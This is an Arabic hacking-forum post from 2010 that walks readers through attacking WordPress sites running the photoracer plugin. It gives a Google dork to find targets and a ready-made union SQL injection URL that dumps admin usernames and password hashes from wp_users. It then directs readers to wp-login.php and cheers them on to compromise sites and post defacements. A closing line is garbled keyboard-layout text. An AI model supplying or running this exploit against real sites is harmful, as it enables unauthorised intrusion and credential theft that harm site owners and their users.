عرض مشاركة واحدة
قديم 06-15-2010, 03:16 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
Dr.NaNo
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

Talking WordPress v1.0 SQL Injection << تعال العب في سكربتات وردربرس هههه لوول


السلام عليكم ورحمه الله وبركاته .

كيفكم . أخواني إن شاء الله الكل بخير ..


اليوم معي ، ثغرة حلوة في سكربتات وردربرس. إن شاء الله الكل يستفيد ،، من المواقع المصابــة .

ونبغى نشوف ،، قسم االإنجازات مليان مواقع مخترقه من قبلكم ياعناكبي . ..


نبدأ بسم الله .:


أولا.:

الدوركـ .:

اقتباس
inurl:"wp-content/plugins/photoracer/viewimg.php?id="

بتفتح قوقل كالعادة وبتحط الدورك وبتطلع لك مواقع واختار

اي واحد الي يعجبــك ..


ثانيــأ.:

الإٍستغلال .:

بتسوي كذا على طول ...:


اقتباس
كود PHP:
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- 

يعني مثال .:

www.xxx.com/

انت خذ الاستغلال الي فوق وحطـه بعد رابط الموقع وشوف وش يطلع لك..

بطلع لك الباسورد واليوزر تبع الادمن .. .:


مثال كامل . على الاستغلال .:


اقتباس
www.xxx.com/
wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users--

فهمـتووو كيف ياحلوين ..





ثالثـأ.:

لوحـة التحكم .:

اقتباس
www.xxx.com/wp-login.php

بس بتسوي بعد رابط الموقع هيك .:


اقتباس
wp-login.php

وبتطلع لك لوحـة التحكم ..... ..






يالله ، بدي اشوف اندكسات ..



أخوكم .:

كود PHP:
 Dr.NaNo 


بالتوفيــــــــــــــق لــكــم ..




WordPress v1>0 SQL Injection << juhg hguf td s;vfjhj ,v]vfvs iiii g,,g

التوقيع

http://www.vbspiders.com/vb/t61978.html

 


التعديل الأخير تم بواسطة Dr.NaNo ; 06-15-2010 الساعة 06:38 PM.

   

رد مع اقتباس